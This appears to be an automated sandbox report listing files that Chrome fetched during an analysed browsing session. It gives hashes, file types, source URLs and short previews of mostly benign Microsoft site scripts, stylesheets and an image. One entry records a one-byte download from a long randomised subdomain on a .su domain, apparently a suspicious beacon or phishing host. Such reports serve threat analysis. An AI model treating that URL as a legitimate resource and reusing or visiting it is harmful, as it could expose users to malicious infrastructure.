                                                                Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:downloaded
                                                                Size (bytes):27110
                                                                Entropy (8bit):5.540190049504032
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:47CCA7D7444E459482A764239B3EA113
                                                                SHA1:0F084A288D40904FCA8E2C08114D5CEF8363A17E
                                                                SHA-256:C0A0240EEA271E8B0A4EFF139EECDC8B797065444DAAE9048734E99D7C9180E1
                                                                SHA-512:B7B148BD83B28F8749589539ECCA7818435427202679B187CB9373E8DE6EA5E26B0FB8E791EDE87DE2BB1AAFD6F4C959FB244BA4B129D5D9253E9714CBE2667F
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://www.microsoft.com/videoplayer/lib/js/index.js
                                                                Preview:document.addEventListener("DOMContentLoaded", function(event) ..{.. const vpElements = document.getElementsByClassName('c-video-player');.. const vpElement = vpElements && vpElements.length && vpElements.item(0);.... if (!vpElement) {.. console.log('no video player element found').. return;.. }.... function tryParse(value, defaultValue) {.. try {.. return JSON.parse(value);.. }.. catch (e) {.. return defaultValue;.. }.. }.... function removeFirstSlash(string) {.. if (!string || string[0] !== '/') {.. return string;.. }.. return string.substring(1);.. }.... function getPlayerDataFromUrl() {.. const paths = removeFirstSlash(window.location.pathname).split('/');.. const videoId = paths[paths.length - 1];.... const metadata = {.. videoId: videoId.. }.. const options = {.. // default options here. below is where w
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (65398)
                                                                Category:dropped
                                                                Size (bytes):149977
                                                                Entropy (8bit):5.425465014322962
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:107489D1ED6BE77BFD69EBE4D7B52B6D
                                                                SHA1:FD56DF206A1DD0223D6D18ADAC841582282A346E
                                                                SHA-256:3BBC0000E28054DDBE38B2E7A21DCA8D66FDA56EA48448BCE4658BC6B518A970
                                                                SHA-512:51C5F6D9D7D10D06777ADE20C7E63CBFA354B830B68D32FEDE4B93C15D80873C501C0CCC4D006FD58C639662D2DCBBA193B61427D30F8938EDA4B9049743BC65
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:/*!. * 1DS JS SDK Analytics Web, 4.0.2. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,n){var t="undefined";if("object"==typeof exports&&typeof module!=t)n(exports);else if("function"==typeof define&&define.amd)define(["exports"],n);else{var r,i,e=typeof globalThis!=t?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_analytics_web_4_0_2={},s="4.0.2",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},g=e.v=e.v||[],l=d[o]=d[o]||{},p=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),n(a),a)r="x",f[i]=a[i],g[i]=s,typeof d[i]==t?(r="n",(d[i]=a[i])&&(p[i]=s)):p[i]||(p[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(t){"use strict";var o="object",ye="undefined",c="prototype",u=Object,s=u[c],$=undefined,y=null,l="",f="boolean",d="function",g="number",v="object",m="prototype",T="__proto__",b="string",I="undefined",C="constructor",N="Symbol",S="_polyfill",w="indexOf",P="length",A="done",_="value",D="name",O="sl
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (6341), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):25535
                                                                Entropy (8bit):5.996995625232308
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:C5670648421751580749A46C5809C1C3
                                                                SHA1:7C8228B4CEAC5842D8A70E6D624EBBC82027E399
                                                                SHA-256:20181E00A916050CA2BA0A9816A41C2DD51259044425DCE131E9AB47DF6284F6
                                                                SHA-512:512F8DAA1E8B9C16BEEE8CE6A7CD70330012036C8F477FA1C9756AF71F50D039FA5DB7BF166048AFE922870AF1DF8236EA746C7BEA071233A848F2A23F9F8E22
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:if (require(["jqReady!", "window", "document", "location", "deferExec!"], function () { window.location.host.indexOf("businessstore.microsoft.com") != -1 && msCommonShell && (msCommonShell.as = { callback: function () { } }) }), window.location.host.indexOf("businessstore.microsoft.com") != -1) { var p = document.createElement("nav"); x = document.getElementById("headerUniversalHeader"); x.insertBefore(p, x.firstChild); p.outerHTML = "<nav id=uhf-g-nav><\/nav>" } require(["jqReady!", "deferExec!"], function (n) { n("[data-ocms-id] .m-content-placement section a, [data-ocms-id] .m-content-placement section").removeAttr("data-js-href").removeAttr("href").bind("mouseup click mousedown", function (n) { n.stopImmediatePropagation(); n.preventDefault() }) }); require(["jqReady!", "deferExec!"], function (n) { n("[data-ocms-id] .m-hyperlink-group-content-placement section a, [data-ocms-id] .m-hyperlink-group-content-placement section").removeAttr("data-js-href").removeAttr("href").bind("mouse
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (14377), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):34954
                                                                Entropy (8bit):5.841288906259157
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:60C5561E85D645D747A96E4960FF8006
                                                                SHA1:1BCB2B55A2713EFA09CF7604D1BCE36073883C94
                                                                SHA-256:45C3C1D743E3CE0CD044D46E45B473C67212D77BBFBC9A93EB1E4D0C0C95D38B
                                                                SHA-512:9EAD1F21B854B63B69E0AD4B29F81921FD83188384917E46BA8DA671CBD9F6B513E28AD6A87C5C4A86C1BED1FCD785EE6F54405547CDF9D90AAB08C617C08D5C
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview://<![CDATA[.._pageBITags = {.. "pageTags": {.. "uri": window.location.href,.. "mkt": "en-us",.. "referrerUri": document.referrer || '',.. "browserGroup": "uplevel.web.pc.webkit.chrome",.. "enabledFeatures": "cartimagebgcolor:1,sc_helpv2:1,sc_uuid:1,muidfallback:1,sc_promocodecheckout:1,cartnocurrencycodecl:1,crossSellModule:1,noeligibilitycheck:1,sc_pidlnetworkerror:1,sc_autorenewalconsentnarratorfix:1,sc_allowupiforbuynow:1,sc_asyncpurchasefailure:1,sc_showvalidpis:1,RelevanceOverride:1,sc_dimealipaystylingfix:1,coreui_videomodule_useflexsize:1,removedeliverystringforamc:1,newvortexendpoint:1,sc_fincastleui:1,usepdpdcm:1,sc_purchasedblockedby:1,sc_cobrandingidurlparam:1,sc_preparecheckoutperf:1,sc_disablebuynowpmgrouping-storewindowsinapp:1,sc_setbehaviordefaultvalue:1,blockineligibleproduct:1,displayappliedfilter:1,sc_checkoutplaceordermoraybuttons:1,sc_buynowpmgrouping:1,sc_paymentoptionnotfound:1,disablealipayadd:1,pdpproductcompare:1,sc_imagel
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (2230), with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):2230
                                                                Entropy (8bit):5.1220413514345156
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:4D56AF8ACF934242A6D0C2D5FD5785E1
                                                                SHA1:9D58373C57C53221C4762B87BDC186F6E38384D0
                                                                SHA-256:6F26F0CC605A8C789C557B2956CE78D147D5D2CC16D2F09B3A606306BCA3F4DE
                                                                SHA-512:1ECA9E9FEF9757337739BC530C87AAA8B9209A14C16F570FC8041618274330E3649F6D0A7E9FA97DC45DC8BB8FDE61A18E06F98E8A48E7BC5F22D4D53CC217A3
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://support.microsoft.com/css/SearchBox/search-box.css?v=bybwzGBajHicVXspVs540UfV0swW0vCbOmBjBryj9N4
                                                                Preview:.searchBox .searchBoxForm{position:relative;margin:0}.searchBox .searchBoxForm .searchBoxInput{width:100%;height:3.1875rem;font-family:"Segoe UI","Segoe UI Web","wf_segoe-ui_normal","Helvetica Neue","BBAlpha Sans","S60 Sans",Arial,sans-serif;font-size:1rem;padding-left:1.125rem;padding-right:3.625rem;border:.0625rem solid #a3a3a3;border-radius:.125rem;box-sizing:border-box;outline:0}html[dir=rtl] .searchBox .searchBoxForm .searchBoxInput{padding-left:3.625rem;padding-right:1.125rem}.searchBox .searchBoxForm .searchBoxButton{position:absolute;font-family:"Segoe UI","Segoe UI Web","wf_segoe-ui_normal","Helvetica Neue","BBAlpha Sans","S60 Sans",Arial,sans-serif;cursor:pointer;padding:0 .25rem;top:0;right:0;width:3.125rem;height:3.1875rem;background-color:transparent;border:none}html[dir=rtl] .searchBox .searchBoxForm .searchBoxButton{left:0;right:auto;transform:scaleX(-1)}.searchBox .searchBoxForm .searchBoxButton .searchBoxIconContainer{display:flex;color:#0078d4;justify-content:center}.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (14627), with CRLF line terminators
                                                                Category:downloaded
                                                                Size (bytes):34420
                                                                Entropy (8bit):5.933131881461907
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:D6146B77BA7152DCFCAA2A1EC322DF7F
                                                                SHA1:DE27B792A759F7B1274CE6AB2EED5ED427770A89
                                                                SHA-256:D12C1EA31EF9507BABB743EA6E7D1B8B4A653CEE8514BDE1B27CED6E0725CC43
                                                                SHA-512:83609244B543FFB029F80B0A23DE385FDF32C2D94B74BDAB2C086BCC4DB682239512B9F193DF94A133D06CF4239FDE7110B2AC17B8D4A85B4212FFFD8DBF130F
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://www.microsoft.com/videoplayer/lib/js/lazy-sizes.js
                                                                Preview:function _preLoadErrorHandler() { if (arguments) { var n = { Page: window.location.href, Message: arguments[0] || "", Script: arguments[1] || "inline", LineNumber: arguments[2] || 0, UserAgent: window.navigator ? window.navigator.userAgent : "" }; _preLoadErrorsBuffer.push(n) } } var _preLoadErrorsBuffer = []; (function (n) { var t = window.onerror; window.onerror = function () { t && t.apply(this, arguments); n.apply(this, arguments) } })(_preLoadErrorHandler);../*! lazysizes - v2.0.0 Copyright (c) 2015 Alexander Farkas.. Released under MIT license, http://github.com/aFarkas/lazysizes..*/..(function (n, t) { var i = t(n, n.document); n.lazySizes = i; typeof module == "object" && module.exports && (module.exports = i) })(window, function (n, t) { "use strict"; if (t.getElementsByClassName) { var i, s = t.documentElement, f = n.Date, ft = n.HTMLPictureElement, e = "addEventListener", r = "getAttribute", o = n[e], u = n.setTimeout, et = n.requestAnimationFrame || u, c = n.requestIdleC
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:Unicode text, UTF-16, little-endian text, with very long lines (32767), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):143816
                                                                Entropy (8bit):3.9507502670285515
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:23F7CC5C0B4E4092673A7540D08542C6
                                                                SHA1:CF6B26C0CAFB2EDA6A0356DBD7F8FE72A72C9DCC
                                                                SHA-256:7B12CF0775FEE74F37F7A1E2D91247303BB37C0F834EABC6B30EE7BDCECE6883
                                                                SHA-512:AE85CB3065342CF505A94D6891A26CC5110431D29505C2EA94D780D8E120916CBA0D9B258CF660475E1EDB798C24DC19A13C306C24FAC15D0A640E12EFF8AB40
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:..v.a.r. .W.c.p.C.o.n.s.e.n.t.;.!.f.u.n.c.t.i.o.n.(.).{.v.a.r. .e.=.{.2.2.9.:.f.u.n.c.t.i.o.n.(.e.).{.w.i.n.d.o.w.,.e...e.x.p.o.r.t.s.=.f.u.n.c.t.i.o.n.(.e.).{.v.a.r. .t.=.{.}.;.f.u.n.c.t.i.o.n. .o.(.n.).{.i.f.(.t.[.n.].).r.e.t.u.r.n. .t.[.n.]...e.x.p.o.r.t.s.;.v.a.r. .r.=.t.[.n.].=.{.i.:.n.,.l.:.!.1.,.e.x.p.o.r.t.s.:.{.}.}.;.r.e.t.u.r.n. .e.[.n.]...c.a.l.l.(.r...e.x.p.o.r.t.s.,.r.,.r...e.x.p.o.r.t.s.,.o.).,.r...l.=.!.0.,.r...e.x.p.o.r.t.s.}.r.e.t.u.r.n. .o...m.=.e.,.o...c.=.t.,.o...d.=.f.u.n.c.t.i.o.n.(.e.,.t.,.n.).{.o...o.(.e.,.t.).|.|.O.b.j.e.c.t...d.e.f.i.n.e.P.r.o.p.e.r.t.y.(.e.,.t.,.{.e.n.u.m.e.r.a.b.l.e.:.!.0.,.g.e.t.:.n.}.).}.,.o...r.=.f.u.n.c.t.i.o.n.(.e.).{.".u.n.d.e.f.i.n.e.d.".!.=.t.y.p.e.o.f. .S.y.m.b.o.l.&.&.S.y.m.b.o.l...t.o.S.t.r.i.n.g.T.a.g.&.&.O.b.j.e.c.t...d.e.f.i.n.e.P.r.o.p.e.r.t.y.(.e.,.S.y.m.b.o.l...t.o.S.t.r.i.n.g.T.a.g.,.{.v.a.l.u.e.:.".M.o.d.u.l.e.".}.).,.O.b.j.e.c.t...d.e.f.i.n.e.P.r.o.p.e.r.t.y.(.e.,."._._.e.s.M.o.d.u.l.e.".,.{.v.a.l.u.e.:.!.0.}.).}.,.o...t.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (3176), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):22138
                                                                Entropy (8bit):5.922394603752133
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:10BE52A831CE932081F13FB7D49F85D9
                                                                SHA1:FCF7E648CE6581AC592ED0B537B5BDA13BD83C28
                                                                SHA-256:83C83C9F5B4F2C154B33CA3245529EF48E7BAFC78D8A948CDD3347BC60DE21AD
                                                                SHA-512:FF29793B9B4E80D829B1B608C5A28978CACC95C3563BC95BEEAA947248EB064253DBCE10F514F8A3325E0D527D92DCFD068029AB8051EAA2735FF501E2B4B431
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:require(["window", "document", "location", "deferExec!"], function (n, t, i) { var r, u, f; if (i.host.indexOf(".xbox.com") != -1 && (r = document.getElementsByClassName("video-player"), r && r.length)) for (u = 0; u < r.length; u++)f = r[u].getAttribute("data-player-data"), f && f.length && r[u].setAttribute("data-player-data", f.replace("autoLoad", "autoload")) }); define("uhfUssCategoryService", ["require", "exports"], function (n, t) { "use strict"; var i = function () { function n(n) { this.market = n; this.responseCache = {}; this.ajaxCall = function (n, t) { var i = new XMLHttpRequest; i.open("GET", n); i.onreadystatechange = function () { this.readyState === 4 && this.status >= 200 && this.status < 400 && t(this.responseText) }; i.send(); i = null } } return n.prototype.getServiceUrl = function (n) { return "https://ussearchprod.trafficmanager.net/services/api/v1.0/store/categories" + ("?clientid=7f27b536-cf6b-4c65-8638-a0f8cbdfca65&scope=games,apps,devices,software&query=" + n
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):21727
                                                                Entropy (8bit):5.232101618468897
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:C49C34EE38F103BCB82F58DED32F57DB
                                                                SHA1:757C8CE6D92102903F636C20B70E414A5E9A2E20
                                                                SHA-256:BDBBDA3BD97031FF5BCB76B427D2ECD9C4617922C3860F662E51FB18AC5CC591
                                                                SHA-512:5C5307784F8B7D3CF479154CADF3525D1D1BF05216D72BB32ABEF6E25183E26FB4D84DB7B14AA2868B11F54E23284D02BFE0309EE4D560AC79A507F762DBC219
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:/*! Copyright (C) Microsoft. All rights reserved. */....(function ($) {...'use strict';...(function smartFeedback() {....var activatedStarRatingValue = null;....var activatedStarRatingLabel = null;....var userSelectionIsInfoHelpful = null;......var checkBoxSelected = false;....var starRatingSelected = false;....var verbatimEntered = false;....var $spanDisplayElementsForStarCheckbox = $(".translationRatingStar, .checkboxTick");....var $extendedFeedbackStarCheckboxElements = $(".translationRatingStar, .articleExperienceOptionsCheckbox");......var $extendedFeedback = $("#extendedFeedback");....var $extendedFeedbackForm = $("#extendedFeedbackForm");....var $feedbackWrapper = $('#supWrapperToPreventFeedbackFlickering');....var $starRatingDescription = $("#starRatingDescription");....var $supDisableStickyFeedbackButton = $("#supDisableStickyFeedbackButton");....var isEnableStarRating = $feedbackWrapper.data("enableStarRating") ? $feedbackWrapper.data("enableStarRating").toLowerCase() === "tr
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (3637)
                                                                Category:dropped
                                                                Size (bytes):3690
                                                                Entropy (8bit):5.141541571595828
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:A249B03B72AB5E7B60E7806457B9BE61
                                                                SHA1:FF0B5F4FB91A9DBF147262AD59B292C6C2DFE122
                                                                SHA-256:48FF8C6449BEF199F206C7A1C49403E10DC6341A9D4A1F8946B042DDE66E315F
                                                                SHA-512:29F204E3813972DC76FCE3DD6715093646EB0DA52DEDAC5E7E09B618E5CF8703CDE95D463727EB29F90D461D0C5A73B5701EC39B994A268103A06306144A6F34
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:!function(){"use strict";var n;!function(n){n.PromotionBanner=".PromotionBanner",n.TopPageBanner=".TopPageBanner",n.AboveUhfBanner=".AboveUhfBanner",n.RailBanner=".RailBanner",n.NpsRailBanner=".NpsRailBanner",n.RailSecondaryCtaBanner=".RailSecondaryCtaBanner"}(n||(n={}));var e=[{dismissSelector:null,clickSelector:"#ucsTopBannerButtonLink",element:n.PromotionBanner},{dismissSelector:"#top-banner-dismiss-button",clickSelector:"#ucsTopBannerButtonLink",element:n.TopPageBanner},{dismissSelector:"#uhf-banner-close",clickSelector:"#upgradeUhfBannerButton",element:n.AboveUhfBanner},{dismissSelector:"#rail-banner-dismiss-button",clickSelector:"#rail-banner-button",element:n.RailBanner},{dismissSelector:"#nps-rail-close",clickSelector:"#nps-rail-link",element:n.NpsRailBanner},{dismissSelector:"#rail-banner-dismiss-button",clickSelector:"#rail-banner-button, #rail-banner-button-secondary",element:n.RailSecondaryCtaBanner}],t=function(){return t=Object.assign||function(n){for(var e,t=1,r=argument
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:JPEG image data, baseline, precision 8, 1920x1080, components 3
                                                                Category:downloaded
                                                                Size (bytes):73501
                                                                Entropy (8bit):7.274239603253508
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:471B948CA93626961E6ADE6DE66FB747
                                                                SHA1:F70E8C1A90732C23BFFA5DC0C417FDF0274EA3F3
                                                                SHA-256:98861B25409C0C097A5F1FA61535701E58F2B0C9F7CC951B0AE1E988238D38E1
                                                                SHA-512:1AD51DF041DB63A5130376D4C645EC16D2C3D2BA0F0635F185C04929AE3D96415273974B03D0898DC057AB50397EED9DD5A4807AA4D6B07D95B7E9520C494502
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4EIZB?ver=f4a3
                                                                Preview:......Lavc58.18.100....C...........................................................##$++3..............................................................................!...1Q2aqA".#.R..BU...3..s..r4bCS..$.T.5e.c...D..Vd.f.%......................1Q!A.a....q....2"...R.bB.#.r..3.....c......8...."...................?...k]1.<...Gq_f>..#....i..w$.:k....Gr@#....i..w$.:k....Gr@#....i..w$.:k....Gr@#....i..w$.:k....Gr@#....i..w$.:k....Gr@#....i..w$.:k....Gr@#....i..w$.:k....Gr@#....i..w$.:k....Gr@#....i..w$.:k....Gr@#....i..w$.:k....Gr@#....i..w$.:k....Gr@#....i..w$.:k....Gr@#....i..w$.:k....Gr@#....i..w$.:k....Gr@#....i..w$.:k....Gr@#....i..w$.:k....Gr@#....i..w$.:k....Gr@#....i..w$.:k....Gr@#....i..w$.:k....Gr@#....i..w$.:k....Gr@#....i..w$.:k....Gr@#....i..w$.:k....Gr@#....i..w$.:k....Gr@#....i..w$.:k....Gr@#....i..w$.:k....Gr@#....i..w$.:k....Gr@#....i..w$.:k....Gr@#....i..w$.:k....Gr@#....i..w$.:k....Gr@#....k]1.<.......4..;.5..GM}#.._H.H.t..;.5..GM}#..
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:very short file (no magic)
                                                                Category:downloaded
                                                                Size (bytes):1
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://xqe94soygyl0xmmn7oi0raibl6rn1ojg7he0qyjbvy1xxkrsv028hloblup.zentriva.su/743470646105465675822808UYtVOmmfQJABUAPXPSQHCRZAIYAYSPTTWLNDRHHRDFPHBETHNQRZQFFFKOBYF
                                                                Preview:1
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (4873), with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):4873
                                                                Entropy (8bit):5.2268236765669895
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:ED927CF0F8A1BE103DF48446270416EE
                                                                SHA1:F7B2BE7FC2B063AAC03E76DF9F3E19D615970213
                                                                SHA-256:EBDD298DFD39A35E5F54469F12953081A17CBEA55F3A4A79C0FD4997D804F7D5
                                                                SHA-512:FCA692C8C7B104FB00C2E6D90C1A0D52A0FF93CDA626338D8FA114A0E9DCE2504DF9282868F98A46648A6E616A96ACD14CAD0460D72477421C8F5EE8F7D34256
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://support.microsoft.com/css/MeControlCallout/teaching-callout.css?v=690pjf05o15fVEafEpUwgaF8vqVfOkp5wP1Jl9gE99U
                                                                Preview:.teachingCalloutPopover{position:absolute;z-index:10000;top:45px;width:336px;right:2vw;color:#000;background-color:#fff;border:1px solid #000;box-sizing:content-box}.teachingCalloutPopover .caretArrow{position:absolute;display:block;width:1rem;height:.5rem;margin:0 .3rem}.teachingCalloutPopover .caretArrow::before{position:absolute;display:block;content:"";border-color:transparent;border-style:solid}.teachingCalloutPopover .caretArrow::after{position:absolute;display:block;content:"";border-color:transparent;border-style:solid}.teachingCalloutPopover .caretArrowPosition{left:215px}.teachingCalloutPopover .win-icon{font-family:"Dev Center MDL2 Assets";font-style:normal;font-weight:normal;line-height:1;position:relative;top:1px;display:inline-block;vertical-align:baseline;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}#teachingCalloutDismiss,#teachingCalloutMessages{color:#000}.teachingCalloutHidden{visibility:hidden}.calloutMessageHidden{display:none}.caretArrowUp{
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (2824)
                                                                Category:dropped
                                                                Size (bytes):2874
                                                                Entropy (8bit):5.196998647096783
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:78C4311E4D7A1AFDE2EC6FB093FE40A2
                                                                SHA1:FB9A1881E03ADF12A393759606FF384F847A52A8
                                                                SHA-256:2CA909B3DA6E4A4FC7FD3C9DD490C4DB45435C995177AA5D7D154852EFD69E25
                                                                SHA-512:8736EA1BD4C1DB34FEE9C3B71753D986FFD56129C12C3D3B3C41B920936C13DFFA59E887FC50A6D6AF33C74A9CAD1531FCCBD9620AE0C1AE2FA3C8BF455465AE
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:!function(){"use strict";var t,n,e,o;function i(t,n){var e,o,i,r;"object"==typeof window.top.analytics&&(t.behavior=null===(o=null===(e=window.top)||void 0===e?void 0:e.oneDS)||void 0===o?void 0:o.Behavior[n],null===(r=null===(i=window.top)||void 0===i?void 0:i.analytics)||void 0===r||r.captureContentUpdate(t))}(e=t||(t={})).None="None",e.EU="EU",function(t){t[t.Undefined=0]="Undefined",t[t.MinorWithoutParentalConsent=1]="MinorWithoutParentalConsent",t[t.MinorWithParentalConsent=2]="MinorWithParentalConsent",t[t.Adult=3]="Adult",t[t.NotAdult=4]="NotAdult",t[t.MinorNoParentalConsentRequired=5]="MinorNoParentalConsentRequired"}(n||(n={})),function(t){t.Impression="IMPRESSION",t.SignIn="SIGNIN"}(o||(o={}));var r,l=function(){return l=Object.assign||function(t){for(var n,e=1,o=arguments.length;e<o;e++)for(var i in n=arguments[e])Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i]);return t},l.apply(this,arguments)};function d(){var t=window.top.document.getElementById("iframeOP");return"
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:Unicode text, UTF-8 text, with very long lines (45900)
                                                                Category:dropped
                                                                Size (bytes):45963
                                                                Entropy (8bit):5.396725281317118
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:F00CFBA8F9859DFEFDFE90EA520C6FCF
                                                                SHA1:B32E153588A287DE81050E327EB5BD7A90B04D99
                                                                SHA-256:977CC9882BA50763333DF64E98D26BC3C60A15D6EFA4A2C1FE70579985EDDF84
                                                                SHA-512:DA51FAB6D6A6B05A1730FB97656A496870FE1248616BC3F9DDBE101D1C189B6BEC7CAF63976418F88843AFA64763D25542787116FFE0E43E35BF3DCE61914DAB
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:!function(){var t={8488:function(t,e,n){var r=n(2746);t.exports=r},3104:function(t,e,n){var r=n(7273);t.exports=r},6564:function(t,e,n){var r=n(2445),o=n(3478),i=n(7269),a=r.TypeError;t.exports=function(t){if(o(t))return t;throw a(i(t)+" is not a function")}},5719:function(t,e,n){var r=n(2445),o=n(3478),i=r.String,a=r.TypeError;t.exports=function(t){if("object"==typeof t||o(t))return t;throw a("Can't set "+i(t)+" as a prototype")}},1313:function(t,e,n){var r=n(4486),o=n(6635),i=n(9783),a=r("unscopables"),u=Array.prototype;null==u[a]&&i.f(u,a,{configurable:!0,value:o(null)}),t.exports=function(t){u[a][t]=!0}},3855:function(t,e,n){var r=n(2445),o=n(7455),i=r.TypeError;t.exports=function(t,e){if(o(e,t))return t;throw i("Incorrect invocation")}},4482:function(t,e,n){var r=n(2445),o=n(3406),i=r.String,a=r.TypeError;t.exports=function(t){if(o(t))return t;throw a(i(t)+" is not an object")}},3410:function(t,e,n){"use strict";var r=n(2445),o=n(6981),i=n(5633),a=n(2048),u=n(7065),s=n(1977),c=n(9
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (34235), with CRLF, LF line terminators
                                                                Category:downloaded
                                                                Size (bytes):100769
                                                                Entropy (8bit):5.246112939487446
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:6FE3DD83A0D98BC1977F57EA33C37693
                                                                SHA1:8DF606F40E4CC8C07CE929D5A82FD5304EAF4EB7
                                                                SHA-256:A5268A183F2A091D2D17773997E89A25FC45CBD60E586EDF61F544FB85D6F6A8
                                                                SHA-512:B81C2EB3BFA8ECF1FFCBB24E4A776CD2B083460A0AC53213EAF48997AC27BB20F49CEFF3A098AEBA33B3AD4F74CA86B5018AFE6689A260F011DF4249029CE78B
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://mem.gfx.ms/scripts/me/MeControl/10.24228.4/en-US/meCore.min.js
                                                                Preview:MeControlDefine("meCore",["exports","@mecontrol/web-inline","@mecontrol/web-boot"],function(e,f,h){"use strict";var r=function(e,t){return(r=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var n in t)t.hasOwnProperty(n)&&(e[n]=t[n])})(e,t)};function t(e,t){function n(){this.constructor=e}r(e,t),e.prototype=null===t?Object.create(t):(n.prototype=t.prototype,new n)}var d=function(){return(d=Object.assign||function(e){for(var t,n=1,r=arguments.length;n<r;n++)for(var o in t=arguments[n])Object.prototype.hasOwnProperty.call(t,o)&&(e[o]=t[o]);return e}).apply(this,arguments)},s=function(){},i={},u=[],l=[];function v(e,t){var n,r,o,i,a=l;for(i=arguments.length;2<i--;)u.push(arguments[i]);for(t&&null!=t.children&&(u.length||u.push(t.children),delete t.children);u.length;)if((r=u.pop())&&void 0!==r.pop)for(i=r.length;i--;)u.push(r[i]);else"boolean"==typeof r&&(r=null),(o="function"!=typeof e)&&(null==r?r="":"number"==typeof r?r=String(r):"s
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
